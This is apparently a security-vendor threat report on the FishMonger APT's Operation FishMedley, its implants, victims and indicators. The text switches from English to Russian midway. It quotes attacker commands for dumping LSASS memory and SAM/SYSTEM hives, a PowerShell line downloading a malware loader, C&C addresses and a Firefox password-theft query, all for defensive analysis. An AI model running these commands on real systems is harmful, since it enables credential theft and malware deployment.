On March 5th, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I‑SOON for their involvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to the FishMonger APT group – I‑SOON’s operational arm – including the compromise of seven organizations that we identified as being targeted in a 2022 campaign that we named Operation FishMedley.
Key points of this blogpost:
- Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States.
- Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
- We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.
- Independent of the DOJ indictment, we determined that FishMonger is operated by I‑SOON.
FishMonger profile
FishMonger – a group believed to be operated by the Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity Report) – falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where I‑SOON’s office was located. FishMonger is also known as Earth Lusca, TAG‑22, Aquatic Panda, or Red Dev 10. We published an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic protests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution to FishMonger.
The group is known to operate watering-hole attacks, as reported by Trend Micro. FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.
Overview
On March 5th, 2025, the US Department of Justice published a press release and unsealed an indictment against I‑SOON employees and officers of China’s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023. The FBI also added those named in the indictment to its “most wanted” list and published a poster, as seen in Figure 1.
The indictment describes several attacks that are strongly related to what we published in a private APT intelligence report in early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments, NGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the recently published indictment.
During 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this blogpost and have named that campaign Operation FishMedley.
FishMonger and I-SOON
During our research, we were able to independently determine that FishMonger is an espionage team operated by I‑SOON, a Chinese contractor based in Chengdu that suffered an infamous document leak in 2024 – see this comprehensive analysis from Harfang Labs.
Victimology
Table 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious interest to the Chinese government.
Table 1. Victimology details
| Victim | Date of compromise | Country | Vertical |
| A | January 2022 | Taiwan | Governmental organization. |
| B | January 2022 | Hungary | Catholic organization. |
| C | February 2022 | Turkey | Unknown. |
| D | March 2022 | Thailand | Governmental organization. |
| E | April 2022 | United States | Catholic charity operating worldwide. |
| F | June 2022 | United States | NGO – mainly active in Asia. |
| G | October 2022 | France | Geopolitical think tank. |
Table 2 summarizes the implants used during each intrusion of Operation FishMedley.
Table 2. Details of the implants used against each victim
| Victim | Tool | ScatterBee-packed ShadowPad | Spyder | SodaMaster | RPipeCommander |
| A | ● | |||
| B | ● | |||
| C | ● | |||
| D | ● | ● | ● | |
| E | ● | |||
| F | ● | ● | ||
| G | ● |
Technical analysis
Initial access
We were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged access inside the local network, such as domain administrator credentials.
At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials that allowed them to connect to the console.
At Victim F, the implants were delivered using Impacket, which means that the attackers somehow previously compromised a high-privilege domain account.
Lateral movement
At Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and installed implants.
Table 3 shows that the operators first did some manual reconnaissance using quser.exe, wmic.exe, and ipconfig.exe. Then they tried to get credentials and other secrets by dumping the local security authority subsystem service (LSASS) process (PID 944). The PID of the process was obtained via tasklist /svc and the dump was performed using comsvcs.dll, which is a known living-off-the-land binary (LOLBIN). Note that it is likely that the attackers executed quser.exe to see whether other users or admins were also logged in, meaning privileged accesses were present in LSASS. According to Microsoft documentation, to use this command the attacker must have Full Control permission or special access permission.
They also saved the registry hives sam.hive and system.hive, which can both contain secrets or credentials.
Finally, they tried to dump the LSASS process again, using a for loop iterating over the output from tasklist.exe. We have seen this same code used on other machines, so it is a good idea to block or at least alert on it.
Table 3. Commands executed via Impacket on a machine at Victim F
Timestamp (UTC)
Command
2022-06-21 07:34:07
quser
2022-06-21 14:41:23
wmic os get lastbootuptime
2022-06-21 14:41:23
ipconfig /all
2022-06-21 14:41:23
tasklist /svc
2022-06-21 14:41:23
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c «C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full»
2022-06-21 14:41:23
reg save hklmsam C:userspublicmusicsam.hive
2022-06-21 14:41:23
reg save hklmsystem C:userspublicmusicsystem.hive
2022-06-21 14:41:23
net user
2022-06-22 07:05:37
tasklist /v
2022-06-22 07:07:33
dir c:users
2022-06-22 09:47:52
for /f «tokens=1,2 delims= » ^%A in (‘»tasklist /fi «Imagename eq lsass.exe» | find «lsass»»‘) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full
Toolset
ShadowPad
ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups, including FishMonger and SparklingGoblin, as documented by SentinelOne. In Operation FishMedley, the attackers used a ShadowPad version packed with ScatterBee.
At Victim D, the loader was downloaded using the following PowerShell command:
powershell (new-object System.Net.WebClient).DownloadFile(«http://<victim’s_web_server_IP_address>/Images/menu/log.dll»;»c:userspubliclog.dll»)
This shows that the attackers compromised a web server at the victim’s organization to use it as a staging server for their malware.
At Victim F, Firefox was used to download the loader, from http://5.188.230[.]47/log.dll. We don’t know whether attackers had interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the victim was redirected to the download page, say via a watering-hole attack.
log.dll is side-loaded by an old Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a file named log.dll.dat, which can be decrypted using the scripts provided in PwC’s GitHub repository.
We did not recover the log.dll.dat from the victim’s machine, but we found a fake Adobe Flash installer on VirusTotal with the identical log.dll file. The configuration of the ShadowPad payload is provided in Table 4.
Table 4. ShadowPad configuration
| Field | Decrypted value |
| Timestamp | 3/14/2022 10:52:16 PM |
| Campaign code | 2203 |
| File path | %ALLUSERSPROFILE%DRMTest |
| Spoofed name | Test.exe |
| Loader filename | log.dll |
| Payload filename | log.dll.dat |
| Service name | MyTest2 |
| Alternative service name | MyTest2 |
| Alternative service name | MyTest2 |
| Registry key path | SOFTWAREMicrosoftWindowsCurrentVersionRun |
| Service description | MyTest2 |
| Program to inject into | %ProgramFiles%Windows Media Playerwmplayer.exe |
| Alternative injection target | N/A |
| Alternative injection target | N/A |
| Alternative injection target | %windir%system32svchost.exe |
| C&C URL | TCP://api.googleauthenticatoronline[.]com:443 |
| Alternative C&C URL | UDP://api.googleauthenticatoronline[.]com:443 |
| Alternative C&C URL | N/A |
| Alternative C&C URL | N/A |
| Proxy info string | SOCKS4nnnnn |
| Proxy info string | SOCKS4nnnnn |
| Proxy info string | SOCKS5nnnnn |
| Proxy info string | SOCKS5nnnnn |
Note that from March 20th, 2022 to November 2nd, 2022, the C&C domain resolved to 213.59.118[.]124, which is mentioned in a VMware blogpost about ShadowPad.
Spyder
At Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in great detail by Dr.Web.
A Spyder loader was downloaded from http://<a_victim’s_web_server_IP_address>/Images/menu/aa.doc and dropped to C:UsersPublictask.exe around 18 hours after ShadowPad was installed.
The loader – see Figure 2; reads the file c:windowstempguid.dat and decrypts its contents using AES-CBC. The encryption key is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. The initialization vector (IV) is the first eight bytes of the key. Unfortunately, we were unable to recover the guid.dat file.
Then, the loader injects the decoded content – likely shellcode – into itself (task.exe process) as seen in Figure 3.
Despite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost identical to the Spyder variant documented by Dr.Web. The C&C server was hardcoded to 61.238.103[.]165.
Interestingly, multiple subdomains of junlper[.]com, a known Spyder C&C domain and a weak homoglyph domain to juniper.net, resolved to 61.238.103[.]165 in 2022.
A self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint 89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is a certificate used by FishMonger for its C&C servers.
SodaMaster
SodaMaster is a backdoor that was documented by Kaspersky in 2021. APT10 was the first group known to have access to this backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.
SodaMaster can only be found decrypted in memory and that’s where we detected it. Even though we did not recover the full loading chain, we have identified a few samples that are the first step of the chain.
SodaMaster loaders
We found six different malicious DLLs that are abusing legitimate executables via DLL side-loading. They all implement the same decryption and injection routine.
First, the loader reads a hardcoded file, for example debug.png, and XOR decrypts it using a hardcoded 239-byte key. Table 5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the table. Also note that we did not recover any of these encrypted payloads.
Table 5. SodaMaster loaders
| SHA-1 | DLL name | Payload filename |
| 3C08C694C222E7346BD8 |
DrsSDK.dll | <current_directory>debug.png |
| D8B631C551845F892EBB |
libvlc.dll | <current_directory>vlc.cnf |
| 3A702704653EC847CF91 |
safestore64.dll | <current_directory>Location |
| 3630F62771360540B667 |
DeElevator64.dll | <current_directory>Location |
| A4F68D0F1C72C3AC9D70 |
libmaxminddb-0.dll | C:windowssystem32 |
| 5401E3EF903AFE981CFC |
safestore641.dll | <current_directory>Location |
Then, the decrypted buffer is injected into a newly created, suspended svchost.exe process – see Figure 4.
Finally, the shellcode is executed using either CreateRemoteThread (on Windows XP or older versions) or, on newer Windows versions, via NtCreateThreadEx as shown in Figure 5.
The last four loaders in Table 5 have additional features:
- They have an export named getAllAuthData that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins.
- The last three loaders persist as a service named Netlock, MsKeyboardFiltersrv, and downmap, respectively.
SodaMaster payload
As mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we’ve found don’t seem to have evolved much. They still implement the same four backdoor commands (d, f, l, and s) that were present in 2021.
Table 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different C&C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.
Table 6. SodaMaster configuration
Victim
C&C server
RSA key
B
162.33.178[.]23
MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
C
78.141.202[.]70
MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
F
192.46.223[.]211
MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE=
G
168.100.10[.]136
MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE=
RPipeCommander
At Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably loaded from disk or downloaded by Spyder. Because its DLL export name was rcmd64.dll, we named this implant RPipeCommander.
RPipeCommander is multithreaded and uses IoCompletionPort to manage the I/O requests of the multiple threads. It creates the named pipe \.PipeCmdPipe<PID>, where <PID> is the current process ID, and reads from and writes into this pipe.
RPipeCommander is a reverse shell that accepts three commands via the named pipe:
- h (0x68): создать процесс cmd.exe и привязать к нему пайпы для отправки команд и чтения вывода.
- i (0x69): записать команду в существующий процесс cmd.exe или прочитать вывод предыдущей команды.
- j (0x6A): завершить процесс cmd.exe, записав exitrn в командную строку.
Стоит отметить, что у нас есть только серверная часть RPipeCommander. Скорее всего, использовался второй компонент, клиент, для отправки команд серверу с другой машины в локальной сети.
Наконец, RPipeCommander написан на C++, и информация RTTI была включена в захваченные образцы, что позволило нам получить некоторые имена классов:
- CPipeServer
- CPipeBuffer
- CPipeSrvEvent
- CPipeServerEventHandler
Другие инструменты
Помимо основных имплантов, описанных выше, злоумышленники использовали несколько дополнительных инструментов для сбора или эксфильтрации данных, которые мы описываем в Таблице 7.
Таблица 7. Другие инструменты, использованные во время операции Operation FishMedley
| Имя файла | Детали |
| C:Windowssystem32 |
Пользовательский фильтр паролей. Экспорт PasswordChangeNotify вызывается при смене пароля пользователем, и он записывает новый пароль на диск в текущем рабочем каталоге в лог-файл под названием etuper.log. Обратите внимание, что он также может эксфильтровать пароль, отправляя POST-запрос на жестко закодированный C&C-сервер с flag=<password> в данных POST. Однако эта функциональность не включена в данном конкретном образце, и в конфигурации нет C&C-сервера. |
| C:Windowsdebug |
Сетевой сканер fscan, доступный на GitHub. |
| C:nb.exe | nbtscan – сканер NetBIOS. |
| C:Userspublic |
Содержит только dbxcli – инструмент, написанный на Go для взаимодействия с Dropbox. Вероятно, он использовался для эксфильтрации данных из сети жертвы, но мы не получили никакой информации об учетной записи злоумышленников. Обратите внимание, что, несмотря на расширение .zip, это CAB-файл. Он был загружен с http://45.76.165[.]227/wECqKe529r.png. Также обратите внимание, что dbxcli, похоже, был скомпилирован злоумышленниками, поскольку хеш (SHA-1: 2AD82FFA393937A2353096FE2A2209E0EBC1C9D7) имеет очень низкую распространенность в дикой природе. |
Заключение
В этой статье мы показали, как FishMonger провел кампанию против высокопоставленных организаций по всему миру и был предметом обвинения Министерства юстиции США в марте 2025 года. Мы также показали, что группа не стесняется повторно использовать известные импланты, такие как ShadowPad или SodaMaster, даже спустя долгое время после их публичного описания. Наконец, мы независимо подтвердили, что FishMonger — это команда, входящая в китайскую компанию I‑SOON.
По любым вопросам, касающимся наших исследований, опубликованных на WeLiveSecurity, пожалуйста, свяжитесь с нами по адресу threatintel@eset.com.ESET Research предлагает частные отчеты об APT-разведке и потоки данных. По любым вопросам, касающимся этой услуги, посетите страницу ESET Threat Intelligence.
IoCs
Полный список индикаторов компрометации (IoC) и образцов можно найти в нашем репозитории GitHub.
Файлы
| SHA-1 | Имя файла | Обнаружение | Описание |
| D61A4387466A0C999981 |
N/A | Win32/Agent.ADVC | Дроппер ShadowPad. |
| 918DDD842787D64B244D |
log.dll | Win32/Agent.ADVC | Загрузчик ShadowPad, упакованный ScatterBee. |
| F12C8CEC813257890F48 |
task.exe | Win64/Agent.BEJ | Загрузчик Spyder. |
| 3630F62771360540B667 |
DeElevator64 |
Win64/PSW.Agent.CU | Загрузчик SodaMaster. |
| 3C08C694C222E7346BD8 |
DrsSDK.dll | Win64/Agent.CAC | Загрузчик SodaMaster. |
| 5401E3EF903AFE981CFC |
safestore64 |
Win64/PSW.Agent.CU | Загрузчик SodaMaster. |
| A4F68D0F1C72C3AC9D70 |
libmaxminddb |
Win64/PSW.Agent.CU | Загрузчик SodaMaster. |
| D8B631C551845F892EBB |
libvlc.dll | Win64/Agent.BFZ | Загрузчик SodaMaster. |
| 3F5F6839C7DCB1D164E4 |
sasetup.dll | Win64/PSW.Agent.CB | Вредоносный фильтр паролей. |
Сеть
| IP | Домен | Хостинг-провайдер | Впервые замечено | Детали |
| 213.59.118[.]124 | api.googleau |
STARK INDUSTRIES | 2022‑03‑20 | Сервер C&C ShadowPad. |
| 61.238.103[.]165 | N/A | IRT-HKBN-HK | 2022‑03‑10 | Сервер C&C Spyder. |
| 162.33.178[.]23 | N/A | BL Networks | 2022‑03‑28 | Сервер C&C SodaMaster. |
| 78.141.202[.]70 | N/A | The Constant Company | 2022‑05‑18 | Сервер C&C SodaMaster. |
| 192.46.223[.]211 | N/A | Akamai Connected Cloud | 2022‑06‑22 | Сервер C&C SodaMaster. |
| 168.100.10[.]136 | N/A | BL Networks | 2022‑05‑12 | Сервер C&C SodaMaster. |
Техники MITRE ATT&CK
Эта таблица составлена с использованием версии 16 фреймворка MITRE ATT&CK.
| Тактика | ID | Название | Описание |
| Разработка ресурсов | T1583.004 | Приобретение инфраструктуры: Сервер | FishMonger арендовал серверы у нескольких хостинг-провайдеров. |
| T1583.001 | Приобретение инфраструктуры: Домены | FishMonger покупал домены и использовал их для трафика C&C. | |
| Выполнение | T1059.001 | Интерфейс командной строки: PowerShell | FishMonger загрузил ShadowPad с помощью PowerShell. |
| T1059.003 | Интерфейс командной строки: Командная строка Windows | FishMonger развернул Spyder с помощью BAT-скрипта. | |
| T1072 | Инструменты развертывания ПО | FishMonger получил доступ к локальной консоли администратора, используя ее для запуска команд на других машинах в сети жертвы. | |
| Постоянство | T1543.003 | Создание или изменение системного процесса: Служба Windows | Некоторые загрузчики SodaMaster сохраняются через службу Windows. |
| Обход защиты | T1574.002 | Перехват потока выполнения: Побочная загрузка DLL | ShadowPad загружается DLL-файлом под названием log.dll, который побочно загружается легитимным исполняемым файлом Bitdefender. |
| T1140 | Деобфускация/декодирование файлов или информации | ShadowPad, Spyder и SodaMaster расшифровываются и загружаются в память. | |
| Доступ к учетным данным | T1555.003 | Учетные данные из хранилищ паролей: Учетные данные из веб-браузеров | Некоторые загрузчики SodaMaster могут извлекать пароли из локальной базы данных Firefox. |
| T1556.002 | Изменение процесса аутентификации: DLL-фильтр паролей | FishMonger использовал пользовательский DLL-фильтр паролей, который может записывать пароли на диск или эксфильтровать их на удаленный сервер. | |
| T1003.001 | Дамп учетных данных ОС: Память LSASS | FishMonger дампнул память LSASS, используя rundll32 C:windowssystem32comsvcs.dll, MiniDump. | |
| T1003.002 | Дамп учетных данных ОС: Менеджер безопасности аккаунтов | FishMonger дампнул менеджер безопасности аккаунтов, используя reg save hklmsam C:userspublicmusicsam.hive. | |
| Обнаружение | T1087.001 | Обнаружение учетных записей: Локальная учетная запись | FishMonger выполнил команду net user. |
| T1016 | Обнаружение сетевой конфигурации системы | FishMonger выполнил команду ipconfig /all. | |
| T1007 | Обнаружение системных служб | FishMonger выполнил команду tasklist /svc. | |
| T1057 | Обнаружение процессов | FishMonger выполнил команду tasklist /v. | |
| Боковое перемещение | T1021.002 | Удаленные службы: SMB/Административные шары Windows | FishMonger использовал Impacket для развертывания вредоносного ПО на других машинах в локальной сети. |
| Командное управление | T1095 | Протокол не прикладного уровня | ShadowPad обменивается данными через необработанные TCP и UDP. |
